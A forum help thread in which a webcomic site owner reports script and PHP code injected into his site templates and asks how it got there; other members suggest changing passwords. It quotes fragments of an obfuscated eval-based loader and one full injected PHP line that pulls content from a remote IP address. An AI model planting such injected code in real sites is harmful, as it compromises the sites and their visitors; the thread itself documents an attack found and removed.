Annoying malicious code

For requests for help from CG administrators, Wranglers, and experienced CG members. Please read the FAQ before posting. Also look at CG Wiki for tutorials and how-tos written by other CG webtoonists.
Post Reply
User avatar
Elaborate
Newbie
Posts: 6
Joined: Sat Mar 08, 2008 5:58 pm

Annoying malicious code

Post by Elaborate »

After getting warnings when loading my site
in Google Chrome for a couple of days
(something about "content from xuli-xuli.ipq.co" )
I checked the code, and found an unwanted script
inserted in the header of my indextemplate.html;
removing it resolved the problem.

Code: Select all

try{function _X48e(){d=new String(",,``,``.,,`,,,
Anything defining strings like this is suspicious...

Code: Select all

eval(r.substr(0,r.length-1));} _X48e();}catch(e){}
And ending with an "eval" is DEFINITELY suspicious...


What to do now, though?
Should I get myself a new FTP code (how?),
or did this attack go via some other route?
In any case, thought I'd better notify you...

-Roland
http://goldenage.comicgen.com
Top
User avatar
Elaborate
Newbie
Posts: 6
Joined: Sat Mar 08, 2008 5:58 pm

Re: Annoying malicious code

Post by Elaborate »

So this time, when I updated, I found THIS little gem in my dailytemplate:

Code: Select all

<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>
I mean, I don't think php code WORKS on comicgen unless you've paid for it,
so it should be basically harmless - but it's annoying anyway.
So, is it just my account that's been hacked? Or have others had this problem, too?
Top
User avatar
Spaceprincess
Regular Poster
Posts: 754
Joined: Wed Sep 10, 2008 6:36 pm
Location: omicron persi i 8
Contact:
Contact Spaceprincess

Re: Annoying malicious code

Post by Spaceprincess »

someone told me my site tripped there fire wall security. I assumed it was just the banner ads, but if your getting unwanted code added maybe there is more going.
I didn't see any bad code on mine, but I'm not sure what to look for.
Top
User avatar
Kisai
Goddess of Light
Goddess of Light
Posts: 3276
Joined: Fri Jan 01, 1999 4:00 pm
Location: The Past, the Present, The future
Contact:
Contact Kisai

Re: Annoying malicious code

Post by Kisai »

Elaborate wrote:So this time, when I updated, I found THIS little gem in my dailytemplate:

Code: Select all

<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>
I mean, I don't think php code WORKS on comicgen unless you've paid for it,
so it should be basically harmless - but it's annoying anyway.
So, is it just my account that's been hacked? Or have others had this problem, too?
That's rather interesting, you're right the php code is -not- supposed to work under normal circumstances. Mainly because something like this could be done.

Delete that, and while you're at it, change your password to both your site and your email address (I make a habit of deleting password change emails), since those are the only two vectors that could have been done.
Top
Post Reply

Return to “Help Center”